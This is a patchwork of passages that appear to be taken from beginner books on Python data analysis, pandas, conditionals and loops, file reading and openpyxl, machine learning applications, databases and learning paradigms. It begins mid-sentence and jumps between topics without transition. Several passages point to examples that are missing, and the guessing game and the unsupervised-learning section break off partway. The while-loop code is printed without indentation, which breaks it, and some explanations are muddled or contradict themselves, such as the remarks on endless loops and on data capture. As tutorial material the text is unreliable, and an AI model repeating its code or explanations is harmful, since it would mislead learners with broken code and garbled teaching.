process. There are a number of reasons that a company would choose to work on their own data analysis.
One thing that we need to make sure that we are watching out for is
the idea of bias in the information that we have. If you go into the
data analysis with the idea that something should turn out a certain
way, or that you are going to manipulate the data so it fits the ideas
that you have, there are going to be some problems. You can
always change the data to say what you would like, but this doesn’t
mean that you are getting the true trends that come with this
information, and you may be missing out on some of the things that
you actually need to know about.
This is why a lot of data analysts will start this without any kind of
hypothesis at all. This allows them to see the actual trends that
come with this, and then see where the information is going to take
you, without any kind of slant with the information that you have.
This can make life easier and ensures that you are actually able to
see what is truly in the information, rather than what you would
like to see in that information.
Now, there are going to be a few different types of data that you
can work with. First, there is going to be the deterministic. This is
going to also be known as the data analysis that is non-random.
And then there is going to be the stochastic, which is pretty much
any kind that is not going to fit into the category of deterministic.
There are a few stages that are going to come with this data life
cycle, and we are going to start out with some of the basics to
discuss each one to help us see what we are able to do with the data
available to us. First, we work with data capture. The first
experience that an individual or a company should have with a data
item is to have it pass through the firewalls of the enterprise. This
is going to be known as the Data Capture, which is basically going
to be the act of creating values of data that do not exist yet and
have never actually existed in that enterprise either. There are several ways that you can capture this data.
Once you have been able to maintain the data and get it all cleaned
up, it is time to work on the part known as data synthesis. This is a
newer phase in the cycle and there are some places where you may
not see this happen. This is going to be where we create some of
the values of data through inductive logic, and using some of the
data that we have from somewhere else as the input. The data
synthesis is going to be the arena of analytics that is going to use
modeling of some kind to help you get the right results in the end.
Data usage comes next. This data usage is going to be the part of
the process where we are going to apply the data as information to
tasks that the enterprise needs to run and then handle the
management on its own. This would be a task that normally falls
outside of your life cycle for the data. However, data is becoming
such a central part of the model for most businesses and having this
part done can make a big difference.
Now, what if you would like to go through all of that data, but you
would like to only take a look at the data that comes with one
specific country. Let’s say that you would like to look at America
and you want to see what percentage of rain it received between
2016 and 2017. Now, how are you going to get this information in
a quick and efficient manner?
What we would need to do to make sure that we were able to get
ahold of this particular set of data is to work with the data analysis.
There are several algorithms, especially those that come from
machine learning, that would help you to figure out the percentage
of rain that America gets between 2016 to 2017. And this whole
process is going to be known as what data analysis is really all
about.
There are a lot of things that you can enjoy when it comes to working with the Pandas library. First off, this is one of the most popular and easy-to-use Python libraries when it comes to data science, and it works on top of the NumPy library.
a lot of coders are going to like about working with Pandas is that it
is able to take a lot of the data that you need, including a SQL
database or a TSV and CSV file, and will use it to create an object
in Python. This object is going to have columns as well as rows
called the data frame, something that looks very similar to what we
see with a table in statistical software including Excel.
There are many different features that set Pandas apart from some of the other libraries that are out there, and they bring benefits that you are going to enjoy.
Working with the Pandas library is one of the best ways to handle some of the Python coding that you want to do with the help of data analysis. As a company, it is so important to be able to go through and not just collect data, but also to read through that information and learn some of the trends that are available there. Being able to do this can provide your company with the insights it needs to do better and really grow while providing good customer service.
There are a lot of different methods that you can use when it comes
to performing data analysis. And some of them are going to work
in a different way than we may see with Python or with the Pandas
library. But when it comes to efficiently and quickly working through a lot of data, with a multitude of algorithms that can sort through all of this information, working with Python and Pandas is one of the best options.
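As a minimal sketch of what this section describes (assuming the pandas library is installed, e.g. via pip install pandas; the column names and rainfall figures are made up for illustration), here is how a small data frame with rows and columns can be built and filtered down to one country:

```python
import pandas as pd

# Build a DataFrame (rows and columns) from a plain dictionary;
# in practice this data could come from a CSV, TSV, or SQL source
rainfall = pd.DataFrame({
    "country": ["America", "America", "Canada"],
    "year": [2016, 2017, 2016],
    "rain_mm": [715, 767, 537],
})

# Filter to the one specific country mentioned in the text
usa = rainfall[rainfall["country"] == "America"]
print(usa)
print("Average rainfall:", usa["rain_mm"].mean())
```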
Conditional Statements
If Statements
More often than not, you’re faced with a situation where you have
to decide something and then, a few things happen in response to
your decision.
Similarly, programming languages also allow you to write
conditional tests, with which, you can check a condition and make
responses according to it. Let's take a real-life example, and then code it: if the stove is on, then turn it off. If it is not on, then do nothing.
If you take a look, we use the keyword ‘if’ when we’re trying to
put forth a condition. If this, then that. Likewise, Python uses the if
statement to allow you to make a decision based on something.
That ‘something’ in our example was, whether or not the stove was
on. Let’s code it.
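A minimal sketch of the stove example (the variable name is made up for illustration):

```python
stove_is_on = True
action = "do nothing"

# If the condition is true, the indented block runs;
# otherwise the action stays at its default
if stove_is_on:
    action = "turn off the stove"

print(action)   # prints: turn off the stove
```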
‘if-elif-else’ Statements
Usually, when asked to write multiple conditions, you might write
them in a similar fashion: If this, then do this. Else if this, then do
that. Else (none of these), do something completely different.
See, how all these if-elseif-else clauses are linked to one single
conditional statement? This is where the elif or Else If block
comes in. If your variable, the one you wish to use for your
conditional test, has many values, and needs to output differently
for those values, you can put them in an if-elif-else block. This
way, on the first true, no other condition gets executed. Or, elif gets
executed, or the else clause.
We did just the same. We said: if the lights and stove are both on, you just turn off the stove. Else if (elif in Python) the lights are off but the stove is on, turn on the lights and turn off the stove. And further, continue with the else statement.
The example also shows how you can run multiple conditions in an
if-elif-else statement and base the output on all those.
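The lights-and-stove scenario just described can be sketched like this (the variable names are made up for illustration):

```python
lights_on = False
stove_on = True

# Only the first true branch runs; the rest are skipped
if lights_on and stove_on:
    result = "Turn off the stove."
elif stove_on:
    # the lights are off but the stove is on
    result = "Turn on the lights, then turn off the stove."
else:
    result = "Nothing to do."

print(result)   # prints: Turn on the lights, then turn off the stove.
```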
Loops – The Never-Ending Cycle
Imagine you are creating a program which asks the user to guess a
number. The code should ideally run for three times before it could
let the user know that they consumed their three chances and failed.
Similarly, the program should be smart enough to know if the user
guessed the right number, in which case, it would end the execution
of the program by displaying “You guessed the right number!”
We use loops to address such situations. Loops are when an entire
block of code continues to run over and over again, until the
condition set is no longer valid. If you forget to set a condition, or
if a condition is not properly defined, you may start an endless loop
that will never cease, causing the program to crash completely.
Do not worry, your system will not crash. You can end the program
by using the red/pink stop button that always magically appears
after you hit the green run button.
There are essentially two types of loops we use in Python. The first
one is the ‘while’ loop, and the second one is the ‘for’ loop.
The ‘While’ Loop
This type of loop runs a specific block of code for as long as the
given condition remains true. Once the given condition is no longer
valid, or turns to false, the block of code will end right away.
This is quite a useful feature as there may be codes which you may
need to rely on to process information quickly. To give you an
idea, suppose, you are to guess a number. You have three tries.
You want the prompt to ask the user to guess the number. Once the
user guesses the wrong number, it will reduce the maximum
number of tries from three to two, inform the user that the number
is wrong and then ask to guess another time. This will continue
until either the user guesses the right number or the set number of
guesses are utilized and the user fails to identify the number.
Imagine just how many times you would have to write the code
over and over again. Now, thanks to Python, we just type it once
underneath the ‘while’ loop and the rest is done for us.
Here’s how the syntax for the ‘while’ loop looks like:
while condition:
code
code
…
You begin by typing in the word ‘while’ followed by the condition.
We then add a colon, just like we did for the ‘if’ statement. This
means, whatever will follow next, it will be indented to show that
the same is working underneath the loop or the statement.
Let us create a simple example from this. We start by creating a
variable. Let’s give this variable a name and a value like so:
x=0
Nothing fun here, so let us add something to make it more exciting.
Now, we will create a condition for a while loop. The condition
would state that as long as x is equal to or less than 10, the prompt
will continue to print the value of x. Here’s how you would do that:
x=0
while x <= 10:
print(x)
Now try and run that to see what happens!
Your console is now bombarded with a never-ending loop of zeros.
Why did that happen? If you look close enough at the code, we
only assigned one value to our variable. There is no code to change
the value or increase it by one or two, or any of that.
In order for us to create a variable that continues to change after it has printed the initial value, we need to add one more line to the code. Call it the increment code, where x will increase by
one after printing out a value. The loop will then restart, this time
with a higher value, print that and then add one more. The loop will
continue until x is equal to 10. The second it hits the value of 11,
the interpreter will know that the condition no longer remains true
or valid, and hence we will jump out of the loop.
x=0
while x <= 10:
print(x)
x=x+1
The last line will execute and recall the current value of x, and then
it will add one to the value. The result would look like this.
0
1
2
3
4
5
6
7
8
9
10
If you do not like the output to end just like that, add a little print statement to say "The End" and that should do the trick.
I almost forgot! If you intend to add a print statement at the end,
make sure you hit the backspace key to delete the indentation first.
Let’s make things a little more fun now, and to do that, we will be
creating our very first basic game.
Let me paint the scenario first. If you like, pick up a pen and a
paper, or just open notepad on your computer. Try and write down
what you think is the possible solution for this.
The game has a secret number that the end-user cannot see. Let’s
assume that the number is set to 19. We will allow the user to have
three attempts to guess the number correctly. The game completes
in a few possible ways:
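One possible solution, sketched as a while loop. Since a printed page cannot take live keyboard input, the user's guesses are simulated with a preset list instead of input(); the function name, the list, and the messages are made up for illustration:

```python
def play_game(guesses, secret=19, max_tries=3):
    """Return the closing message after at most max_tries guesses."""
    tries = 0
    while tries < max_tries:
        guess = guesses[tries]
        tries += 1
        if guess == secret:
            return "You guessed the right number!"
        print("Wrong! Tries left:", max_tries - tries)
    return "You consumed your three chances and failed."

print(play_game([5, 19]))      # right on the second attempt
print(play_game([5, 7, 12]))   # all three chances used up
```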
There we could see that inside the read() there is a number 9, which tells Python that it has to read only the first nine characters of the file.
Readline(n) Method
The readline method is the one that reads a single line from the file, so that the read bytes can be returned in the form of a string. The readline method is not able to read more than one line, even if n exceeds the length of the line.
Its syntax is very similar to the syntax of the read() method.
Readlines(n) Method
The readlines method is the one that reads all the lines of the file, so that the read bytes can be returned in the form of a list of strings. Unlike the readline method, this one is able to read all the lines. Like the read() and readline() methods, its syntax is very similar:
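A sketch of all three methods on a small throwaway file (the filename and contents are made up for illustration):

```python
# Create a small sample file to read from
with open("sample.txt", "w") as f:
    f.write("first line\nsecond line\nthird line\n")

with open("sample.txt") as f:
    print(f.read(9))      # only the first nine characters: first lin

with open("sample.txt") as f:
    print(f.readline())   # a single line, including its newline

with open("sample.txt") as f:
    print(f.readlines())  # every line, returned as a list of strings
```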
What's a buffer?
We can define the buffer as a region of RAM given temporary use; it will contain a fragment of the data that composes the sequence of files in our operating system. We use buffers very often when we work with a file whose storage size we do not know.
It is important to keep in mind that if the size of the file were to exceed the RAM that our equipment has, and we tried to load it all at once, the processing unit would not be able to execute the program and work correctly.
What is the size of a buffer for? The size of a buffer indicates the storage space available while we use the file. Through the constant io.DEFAULT_BUFFER_SIZE, the program will show us the default buffer size used by the platform.
We can observe this in a clearer way:
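A short sketch of inspecting the platform default (the exact number is platform-dependent; 8192 bytes is common):

```python
import io

# The platform's default buffer size, in bytes
print(io.DEFAULT_BUFFER_SIZE)
```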
Errors
When opening our files, we can pass errors, an optional string which specifies the way in which encoding errors in our program are handled.
The errors argument can only be used for files opened in text mode.
The most common values are the following:
errors='ignore' – this will skip the characters with a wrong or unknown format.
errors='strict' – this is going to raise a subclass of UnicodeError in case any encoding mistake comes up in our file. This is also the default behavior.
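A sketch of both behaviors, using a byte that is invalid in UTF-8 (the filename and contents are made up for illustration):

```python
# Write raw bytes containing an invalid UTF-8 sequence
with open("bad.txt", "wb") as f:
    f.write(b"caf\xff late")

# errors='ignore': the malformed byte is silently dropped
with open("bad.txt", encoding="utf-8", errors="ignore") as f:
    print(f.read())        # prints: caf late

# errors='strict' (the default): a UnicodeError subclass is raised
try:
    with open("bad.txt", encoding="utf-8", errors="strict") as f:
        f.read()
except UnicodeDecodeError as e:
    print("decode failed:", e.reason)
```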
Encoding
The encoding argument is frequently used when we work with data storage, and it is nothing more than the name of the character encoding to use; a character encoding is a system based on bits and bytes as a representation of characters.
For example, we can pass encoding='utf-8' when opening a file.
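A short sketch of writing and reading text with an explicit encoding (the filename and text are made up for illustration):

```python
# Write non-ASCII text using UTF-8 encoding
with open("greeting.txt", "w", encoding="utf-8") as f:
    f.write("¡Hola, señor!")

# Read it back with the same encoding
with open("greeting.txt", "r", encoding="utf-8") as f:
    print(f.read())        # prints: ¡Hola, señor!
```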
Newline
The newline mode is the one that is going to control the functionality of new lines; its value can be None, '', '\n', '\r', or '\r\n'.
The newlines are universal and can be seen as a way of interpreting
the text sequences of our code.
1. The end-of-line sequence in Windows: "\r\n".
2. The end-of-line sequence in classic Mac OS: "\r".
3. The end-of-line sequence in UNIX: "\n".
On input: If the newline is of the None type, the universal newline
mode is automatically activated.
Input lines can end in "\r", "\n" or "\r\n" and are automatically translated to "\n" before being returned by our program. If newline is instead set to any of the other legal values, input lines will be terminated only by that given string, and the line endings will not be translated at the time of return.
On output: If the newline is of the None type, any type of character
"\n" that has been written, will be translated to a line separator
which we call "os.linesep".
If the newline is of the type '' no translation is going to be made, and in case the newline meets any of the other values considered legal for the code, any "\n" characters written will be automatically translated to that string.
Consider an example of newline reading for ''.
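A sketch of reading with newline='' versus the universal default (the filename is made up for illustration):

```python
# Write a file with Windows-style line endings, untranslated
with open("lines.txt", "w", newline="") as f:
    f.write("one\r\ntwo\r\n")

# Default (newline=None): universal mode translates endings to '\n'
with open("lines.txt") as f:
    print(repr(f.read()))

# newline='': no translation is performed, so '\r\n' survives
with open("lines.txt", newline="") as f:
    print(repr(f.read()))
```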
Xlsx files: xlsx files are those files in which you work with spreadsheets; this is nothing more than working with programs like Excel. For example, if we have the Windows operating system on our computer, we have the advantage that when working with this type of file, it will be much lighter (smaller) than other types of files.
The xlsx type files are very useful when working with databases,
statistics, calculations, numerical type data, graphics and even
certain types of basic automation.
In this chapter we are going to learn to work the basic
functionalities of this type of files, this includes creating files,
opening files and modifying files.
To start this, first we will have to install the necessary library; we
do this by executing the command "pip3 install openpyxl" in our
Python terminal.
Once this command is executed, it is going to download and install the openpyxl module for our Python files; we can also look up its documentation to get the necessary information about this module.
Create an xlsx file: To create a file with this module, let's use the Workbook() function of the openpyxl module.
This is the first step we take to manage files of the xlsx type. First we import the Workbook function from the openpyxl module; after that, we assign the result of Workbook() to the variable wb, declaring that this will be the document with which we are going to work (we create the object in the form of a worksheet in this format). Once this is done, we take the active sheet of the wb object in order to assign it a name, and finally we save the file.
Add information to the file with this module: In order to add information to our file, we will need to use other functions that come included with the object; one of them is the append() function.
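Putting these steps together in one sketch (assuming openpyxl is installed via pip3 install openpyxl; the sheet name, rows, and filename are made up for illustration, and the sketch skips gracefully if the module is missing):

```python
try:
    from openpyxl import Workbook
except ImportError:
    Workbook = None  # openpyxl is not installed

if Workbook is not None:
    wb = Workbook()              # create the workbook object
    ws = wb.active               # take the active worksheet
    ws.title = "Inventory"       # assign it a name
    ws.append(["item", "qty"])   # append() adds one row per call
    ws.append(["pens", 12])
    wb.save("inventory.xlsx")    # finally, save the file
    print("saved", ws.max_row, "rows")
else:
    print("openpyxl is not installed")
```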
1. Ensemble modeling
2. Scalability
3. Iterative and automation processes
4. Algorithms, a good combination of basic and advanced ones
5. Data preparation capabilities.
The neat thing about working with machine learning is that almost every industry is able to use it. And it is still relatively new when it comes to the world of technology, so even the amazing things that have been done with it so far are just the beginning, and it is believed that this kind of technology is going to be able to do even more in the future.
Machine learning is likely to grow quite a bit as time goes on. Right now, a
lot of companies are using it in order to figure out what the data they are
receiving is telling them, to figure out how they are able to make better
business decisions over time, rather than having to make the decisions on
their own, and to find some of the patterns that are hidden in the data, and
that a human would not be able to go through.
But this is just the start of what we are able to do when it comes to machine
learning. There are a ton of other applications, and what we are able to do
with this right now is just the beginning. As more people and developers start
to work with machine learning and start to add in some of the Python
languages with it, it is likely that more and more applications are going to be
available as well.
Most of the industries out there that are already working with large amounts of data are going to recognize the kind of value that they would get from using the technology that comes with machine learning. By being able to actually get through this data and glean some good insights from it, and being able to do this close to real-time, the company is then able to work in a more efficient manner and gain a big advantage over others in their same industry.
And this is the beauty of working with machine learning. Things that may have seemed impossible in the past are possible now with the help of machine learning. Businesses that are handling more data than ever
before are finding the value of working with machine learning to help them
get their work done. They can get through this information faster than would
be possible with a person looking through it on their own and can give them
that competitive edge over others.
There are a lot of different companies that will be able to benefit from a
program that can run on machine learning. Some of the different industries
that are already using this kind of technology will include financial services,
government, health care, retail, oil and gas, transportation, and more.
Machine learning is a branch of artificial intelligence that is going to allow a computer to learn, similar to what we are seeing with the human mind as well. With a minimal amount of supervision from a person, the machine will
be able to automate a lot of tasks, find the information that you want, and get
to some insights and predictions that you may not be able to find in other
methods on your own. And this guidebook is going to spend some time
looking at how you are able to do this type of machine learning with the help
of the Python coding language so you can start some of your own projects in
no time.
Chapter 2 Applications of Machine Learning
Machine learning helps to change how businesses work and operate in
today’s world. Through machine learning, large volumes of data can be
extracted, which makes it easier for the user to draw some predictions from a
data set.
There are numerous manual tasks that one cannot complete within a
stipulated time frame if the task includes the analysis of large volumes of
data. Machine learning is the solution to such issues. In the modern world, we are overwhelmed with large volumes of data and information, and there is no way a human being can process all that information. Therefore, there is a need to
automate such processes, and machine learning helps with that.
When any analysis or discovery is automated fully, it will become easier to
obtain the necessary information from that analysis. This will also help the
engineer automate any future processes. The world of business analytics, data
science, and big data requires machine learning and deep learning. Business
intelligence and predictive learning are no longer restricted to just large
businesses but are accessible to small companies and businesses too. This
allows a small business to utilize the information that it has collected
effectively. This section covers some of the applications of machine learning
in the real world.
Virtual Personal Assistants
Some examples of virtual assistants are Allo, Google Now, Siri and Alexa.
These tools help users access necessary information through voice
commands. All you must do is activate the assistant, and you can ask the
machine any questions you want.
Your personal assistant will look for the necessary information based on your
question, and then provide you with an answer. You can also use this
assistant to perform regular tasks like setting reminders or alarms. Machine
learning is an important part of this tool since it helps the system gather the
necessary information to provide you with an answer.
Density Estimation
Machine learning will help a system use any data that is available on the Internet, and it can use that data to predict or suggest some information to users. For example, if you purchase a copy of "A Song of Ice and Fire" from a bookstore, a machine that has modeled the distribution of purchase data can suggest similar books to you.
Latent Variables
When you work with latent variables, the machine will try to identify if these
variables are related to other data points and variables within the data set.
This is a handy method when you use a data set where it is difficult to
identify the relationship between different variables. There are times when
you will be unable to identify why there is a change in a variable. The
engineer can understand the data better if he or she can take a look at the
different latent variables within the data set.
Reduction of Dimensionality
The data set that is used to train machines to predict the outcome to any
problem will have some dimensions and variables. If there are over three
dimensions within the data set, it will become impossible for the human mind
to visualize or understand that data. In these situations, it is always good to
have a machine learning model to reduce the volume of the data into smaller
segments that are easily manageable. This will help the user identify the
relationships that exist within the data set.
Every machine learning model will ensure that the machine learns from the
data that is provided to it. The machine can then be used to classify data or
predict the outcome or the result for a specific problem. It can also be used in
numerous applications like self-driving cars. Machine learning models help improve the ability of smartphones to recognize the user's face, allow Google Home or Alexa to recognize your accent and voice, and explain how the accuracy of these machines improves the longer they have been learning.
Steps in Building a Machine Learning System
Regardless of the type of model that you are trying to build or the problem
that you are trying to solve, you will follow the steps mentioned in this
section while building a machine learning algorithm.
Define Objective
The first step, as it is with any other task that you perform, is to define the
purpose or the objective you want to accomplish using your system. This is
an important step since the data you will collect, the algorithm you use, and
many other factors depend on this objective.
Collect Data
Once you have your objective in mind, you should collect the required data.
It is a time-consuming process, but it is the next important step that you must
achieve. You should collect the relevant data and ensure that it is the right
data for the problem you are trying to solve.
Prepare Data
This is another important step, but engineers often overlook it. If you do
overlook this step, you will be making a mistake. It is only when the input
data is clean and relevant that you will obtain an accurate result or prediction.
Select Algorithm
Numerous algorithms can be used to solve a problem, including Support Vector Machines (SVM), k-nearest neighbors, Naive Bayes, and Apriori. You must choose the algorithm that best suits the objective.
Train Model
When your data set is ready, you should feed it into the system and help the
machine learn using the chosen algorithm.
Test Model
When your model is trained, and you believe that it has provided the relevant
results, you can test the accuracy of the model using a test data set.
Predict
The model will perform numerous iterations with the training data set and the
test data set. You can look at the predictions and provide feedback to the
model to help it improve the predictions that it makes.
Deploy
Once you have tested the model and are happy with how it works, you can serialize that model and integrate it into any application that you want to use. This means that the model that you have developed can now be deployed.
The steps followed will vary depending on the type of application and
algorithm that you are using. You can choose to use a supervised or
unsupervised machine learning algorithm. The steps mentioned in this section
are often the steps followed by most engineers when they are developing a
machine learning algorithm. There are numerous tools and functions that you
can use to build a machine learning model. This book will help you with
understanding more about how you can design a machine learning model
using Python.
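The steps above can be sketched end-to-end in plain Python. This is a minimal illustration only: the tiny data set, the 1-nearest-neighbour "model", and the train/test split are all invented for the example, and a real project would use a library such as scikit-learn.

```python
import pickle

# Collect: a tiny invented data set of (measurement, label) pairs.
data = [(1.0, "small"), (1.2, "small"), (3.8, "large"), (4.1, "large")]

# Prepare: split the clean data into a training set and a test set.
train, test = data[:3], data[3:]

# Select algorithm + train: a 1-nearest-neighbour "model" is simply the
# training data plus a rule for predicting from it.
def predict(model, x):
    # Return the label of the training point closest to x.
    return min(model, key=lambda pair: abs(pair[0] - x))[1]

model = train

# Test: measure accuracy on the held-out data.
accuracy = sum(predict(model, x) == y for x, y in test) / len(test)
print("accuracy:", accuracy)

# Deploy: serialize the model so another application can load it later.
blob = pickle.dumps(model)
restored = pickle.loads(blob)
print(predict(restored, 0.9))  # prints small
```

Even in this toy form, the pipeline shows why the earlier steps matter: with dirty or irrelevant training data, the nearest-neighbour rule would happily return wrong labels.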
Chapter 3 Big Data and Machine Learning
In order to learn something, a system that is capable of machine learning
needs to be exposed to a lot of data. Going back several decades, computers
didn’t have access to all that much data, in comparison to what they can
access today. Computers were slow and quite awkward. Most data at that
time was stored on paper, and so it was not readily accessed by computer
systems. There was also far less of it. Of course, companies and large
businesses, along with governments have always collected as much data as
they could, but when you don’t have that much data and it’s mostly in the
form of paper records, then you don’t have much data that is useful to a
machine learning computer system.
The first databases were invented in the late 1960s. A database is not really
what we think of when considering the relationship between data and
machine learning, although it could be in some circumstances. Databases
collect very organized information. To understand the difference, think about
a collection of Facebook posts, versus a record of someone registering to
enroll at a university. The collection of Facebook posts is going to be
disorganized and messy. It is going to have data of different types, such as
photos, videos, links, and text. It’s going to be pretty well unclassified,
maybe only marked by who posted it and the date.
In contrast, when you say database you should think completely organized
and restricted data. A database is composed of individual records, each record
containing the same data fields. At a university, enrolling students might enter their name, social security or ID number, address, and so on.
All of these records are stored in the same format, together in one big file.
The file can then be “queried” to return records that we ask for. For example,
we could have it return records for everyone in the Freshman class.
Relational databases allow you to cross reference information and bring it
together in a query. Following our example, you could have a separate
database that had the courses each student was taking. This could be stored in
a separate database from the basic information of each student, but it could be
cross-referenced using a field such as a student ID.
Tools were developed to help bring data together from different databases.
IBM, a company that seems to loom large in many developments in computer science, developed SQL, the first Structured Query Language, which could be used to do tasks like this. Once data could be pulled together, it
could be analyzed or used to do things like print out reports for human
operators.
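The querying and cross-referencing described above can be tried directly with Python's built-in sqlite3 module. The table layout, names, and values here are invented for the example.

```python
import sqlite3

con = sqlite3.connect(":memory:")  # a throwaway in-memory database
cur = con.cursor()

# Two separate tables, linked by a shared student_id field.
cur.execute("CREATE TABLE students (student_id INTEGER, name TEXT, year TEXT)")
cur.execute("CREATE TABLE courses (student_id INTEGER, course TEXT)")
cur.executemany("INSERT INTO students VALUES (?, ?, ?)",
                [(1, "Ada", "Freshman"), (2, "Ben", "Senior")])
cur.executemany("INSERT INTO courses VALUES (?, ?)",
                [(1, "Biology"), (1, "Calculus"), (2, "History")])

# Query: cross-reference the two tables on student_id and return
# only the records for the Freshman class.
rows = cur.execute("""
    SELECT s.name, c.course
    FROM students s JOIN courses c ON s.student_id = c.student_id
    WHERE s.year = 'Freshman'
    ORDER BY c.course
""").fetchall()
print(rows)  # [('Ada', 'Biology'), ('Ada', 'Calculus')]
```

The JOIN clause is exactly the cross-referencing described in the text: two separately stored tables brought together through the shared student ID field.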
As computers became more ubiquitous, companies and government agencies
began collecting more and more data. But it wasn’t until the late 1990s that
the amount of data and types of data began to explode. There were two
developments that led to these changes. The first was the invention of the
internet. The second was the development of ever improving and lower cost
computer storage capacity.
The development and commercialization of the internet meant that over a
very short time period, nearly everyone was getting “online”. Businesses
moved fast to get online with websites. Those that didn’t fell behind, and
many ended up going out of business. But that isn’t what’s important for our
purposes. The key here is that once people got online, they were leaving data
trails all over the place.
This kind of data collection was increasing in the offline world as well, as
computing power started to grow. For example, grocery stores started offering supposed discount and membership cards that really functioned to track what people were buying, so that the companies could make customized offers to customers and adjust their marketing plans accordingly.
The internet also brought the concept of cloud computing to the forefront.
Rather than having a single computer, or a network of computers in one
office, the internet offered the possibility of harnessing the power of multiple
computers linked together both for information processing and doing
calculations and also for simple data storage.
The continual decline in the cost of storage components for computer systems, along with their increased capacity, had a large impact in this area. Soon, more and more data was being collected. Large companies like
Google, and eventually Facebook, also started collecting large amounts of
data on people’s behavior.
This is where the rubber hits the road for machine learning. For the first time, the amounts
of data that machine learning systems needed to be able to perform real world
tasks, not just do things like playing checkers, became possible. Machine
learning systems are trained on data sets, and now businesses (and
governments) had data of all kinds to train machine learning systems to do
many different tasks.
Goals and Applications of Machine Learning
Machine learning is something that can be applied whenever there is a useful
pattern in any large data set. In many cases, it is not known what patterns
exist before the data has been fed to a machine learning system. This is
because human beings are not able to see the underlying pattern in large data
sets, but computers are well suited to finding them. The types of patterns are
not limited in any way. For example, a machine learning system can be used
to detect hacking attempts on a computer network. It can be trained for
network security by feeding the system past data that includes previous
hacking attempts.
1. Supervised Learning
This paradigm happens to be the most popular, probably because it is easy to
comprehend and execute. Here, the algorithm creates a mathematical model from a labeled dataset, i.e., a dataset containing both the input and output parameters. This dataset acts as the trainer for the model. Taking an example, we
may decide to use the algorithm to determine whether a particular image
contains a certain object. In this case, the dataset would comprise images with
and without the input (that object), with every image having the output
designating whether or not it contains the particular object. At first, the algorithm may predict any answer, whether right or wrong. However, after several attempts it gets trained to pick out only the images containing the said object. Once fully trained, the algorithm starts making correct predictions even when new data is input. A perfect example of a supervised learning model is
a support vector machine. In a typical diagram, a support vector machine divides the data into sections separated by a linear boundary, with the boundary separating the white circles from the black ones.
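A real support vector machine chooses the boundary that maximizes the margin between the two classes, which takes more machinery than fits here. As a hedged sketch of just the idea of a linear decision boundary (the line y = x and the points are invented for illustration):

```python
# Points are (x, y) pairs; the two classes sit on either side
# of the invented boundary line y = x.
white = [(1, 3), (2, 5), (0, 2)]   # above the line
black = [(3, 1), (5, 2), (4, 0)]   # below the line

def side(point):
    """Classify a point by which side of y = x it falls on."""
    x, y = point
    return "white" if y > x else "black"

# The boundary cleanly separates the labeled training points...
assert all(side(p) == "white" for p in white)
assert all(side(p) == "black" for p in black)

# ...and classifies a brand-new point the same way.
print(side((2, 6)))  # prints white
```

An SVM's training procedure would learn the boundary from the labeled points rather than having it handed in, but the prediction step, checking which side a point falls on, is the same.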
2. Unsupervised Learning
In unsupervised learning, by contrast, the algorithm works on unlabeled data and must find structure, such as clusters, on its own. Several clustering techniques exist:
❖ Agglomerative
This is the technique where every data point starts as its own group. The number of clusters is then reduced by iteratively merging the two closest groups. Hierarchical clustering is an example.
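A hedged sketch of the agglomerative idea on invented one-dimensional data: every value starts as its own cluster, and the two closest clusters are merged until only two remain.

```python
# Each value starts as its own cluster.
clusters = [[1.0], [1.1], [5.0], [5.2], [9.0]]

def distance(a, b):
    # Single-linkage distance: the closest pair of points between two clusters.
    return min(abs(x - y) for x in a for y in b)

while len(clusters) > 2:  # stop once two clusters remain
    # Find the two closest clusters and merge them.
    pairs = [(i, j) for i in range(len(clusters))
                    for j in range(i + 1, len(clusters))]
    i, j = min(pairs, key=lambda p: distance(clusters[p[0]], clusters[p[1]]))
    clusters[i] += clusters.pop(j)

print(clusters)  # [[1.0, 1.1], [5.0, 5.2, 9.0]]
```

Library implementations (hierarchical clustering in scikit-learn or SciPy) do the same merging, but over many dimensions and with several linkage choices.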
❖ Overlapping
Under this technique, each data point is associated with a suitable membership value. Fuzzy sets are used in grouping data, and each point could fit into two or more groups with different membership degrees. Fuzzy C-Means is a suitable example of this type.
❖ Probabilistic
This concept creates clusters using probability distributions. See the example below, given some keywords:
“Men’s pants”
“Ladies’ pants”
“Men’s wallets”
“Ladies’ wallets”
The given keywords could be grouped into two; “pants” and “wallets” or
“Men” and “Ladies”.
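The two alternative groupings can be reproduced with a few lines of plain Python. A real probabilistic model would assign each keyword a probability of belonging to each cluster rather than a hard membership; this sketch only shows that the same keywords support both groupings:

```python
keywords = ["Men's pants", "Ladies' pants", "Men's wallets", "Ladies' wallets"]

def group_by(keywords, features):
    # Assign each keyword to every feature word it contains.
    groups = {f: [] for f in features}
    for kw in keywords:
        for f in features:
            if f in kw:
                groups[f].append(kw)
    return groups

print(group_by(keywords, ["pants", "wallets"]))
print(group_by(keywords, ["Men", "Ladies"]))
```

Which grouping is "right" depends on which feature the clustering algorithm finds most informative, which is exactly the point of the example in the text.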
Association
Association rules allow the user to establish associations among data objects inside big databases. As the name suggests, the technique seeks to discover unique relations between variables contained in large databases. For instance, shoppers could be grouped based on their search and purchase histories.
3. Reinforcement Learning
This is a learning technique that trains machine learning models to make a progression of decisions. The agent is trained to attain an objective in an uncertain, potentially complex environment. In this technique, an artificial intelligence engages in a game-like situation, and the computer tries to solve the problem by trial and error. To get the machine to do what they want, the programmer has the artificial intelligence penalized or rewarded for the actions it performs. The idea is to maximize the total reward.
Usually there is a reward policy in the form of game rules, but the designer does not give any hints on how the model should solve the puzzle. The model starts from completely random trials and advances to sophisticated approaches, sometimes even superhuman skill. Because it leverages the full power of search, this technique is among the most effective at eliciting a machine's creativity. As opposed to humans, an artificial intelligence can employ a reinforcement algorithm to collect experience from thousands of parallel gameplays, as long as it is run on adequately powerful computer infrastructure.
Let us look at a practical example that will perfectly illustrate the
reinforcement learning technique. However, before then we need to
understand some terms that we will use in the illustration.
Agent: This is an implicit entity that seeks to gain a reward by
performing actions in an environment.
Environment (e): A situation that an agent must face.
Reward (R): An instant response given to an agent on performing a
specific action.
State (s): The current scenario returned by the environment.
Policy (π): An approach employed by the agent to determine their next
action based on the prevailing state.
Value (V): The projected long-term return, discounted, as opposed to the short-lived reward.
Value Function: This one stipulates the total reward, i.e., the value of a state.
Model-based methods: Methods that handle reinforcement learning problems by applying a model of the environment.
Model of the environment: It imitates the behavior of the
environment, helping you draw conclusions regarding environment
behavior.
Action value / Q value (Q): This is not very different from value. In fact, the only variation is that it takes the current action as an extra parameter.
Illustration
Think of trying to teach your dog some new tricks. This dog does not
understand human language so you need to devise a strategy that will help
you achieve your goal. You will initiate a situation and observe the various
reactions by your dog. If the dog responds in the desired way, you give him
some beef. You will realize that every time you expose the dog to a similar
condition, they will tend to respond with greater enthusiasm hoping to get a
reward (the beef). It means that the positive experiences inspire the responses
your dog gives. As well, there are the negative experiences that teach the dog
